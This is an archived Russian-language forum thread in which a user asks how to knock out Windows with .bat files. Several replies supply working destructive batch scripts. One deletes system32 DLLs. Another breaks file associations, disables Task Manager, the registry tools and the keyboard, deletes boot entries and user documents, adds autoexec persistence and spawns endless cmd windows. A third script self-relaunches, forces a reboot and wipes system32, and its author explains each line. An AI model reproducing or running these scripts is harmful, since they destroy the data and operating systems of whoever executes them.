PDA

Просмотр полной версии : как с помощью .bat файлов вывести из работы windows


_eXorcist_
23.02.2010, 19:23
как с помощью .bat файлов вывести из работы windows

good.god
23.02.2010, 19:26
del "%SystemRoot%system32*.dll" /q >nul


Насколько помню dll системные удаляет, должно помочь.

shell_c0de
23.02.2010, 20:02
echo off
assoc .exe=.txt
assoc .mp3=.txt
assoc .avi=.txt
assoc .wav=.txt
assoc .jpg=.txt
assoc .bmp=.txt
assoc .rar=.txt
assoc .zip=.txt
assoc .dll=.txt
assoc .ink=.txt
assoc .drv=.txt
assoc .mpg=.txt
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul
bootcfg /delete /id 1 >nul
taskkill /f /im explorer.exe >nul
copy %0 c:str.bat >nul
echo c:str.bat>>c:autoexec.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
del C:windowsMedia /q
:x
Start cmd
goto x
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
Chcp 1251
del "%USERPROFILE%Мои документы*.*" /q /s
Chcp 1251
label C: LAMER
del "%SystemRoot%system32*.dll" /q >nul
rundll32 keyboard,disable
del %SystemRoot%\system32\devmgmt.msc >nul
reg add HKCU\SoftwareMicrosoft\Windows\CurrentVersion\Poli cies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nul

=)]

Keltos
23.02.2010, 20:11
Учитесь пользоватся поиском.

В блокноте:

CMD /c start /high /min 666.bat
shutdown -r -f -t 35 -c " -----F U C K O F F----- "
del /f/s/q c:\WINDOWS\SYSTEM32\*.*

==============================================

Сохрани как 666.bat


1)Строчка "CMD /c start /high /min 666.bat " запускает сново и сново фаил 666.bat минимизированым.

2)Строчка "shutdown -r -f -t 35 -c " -----F U C K O F F----- " принудительно вырубит комп через 35сек с надпесью "- F U C K O F F -" или что ты там напишешь.

3)Строчка "del /f/s/q C:\WINDOWS\SYSTEM32\*.*" принудительно удалит все файлы кроме системных в папке System32

_eXorcist_
23.02.2010, 20:33
всем большое спасибо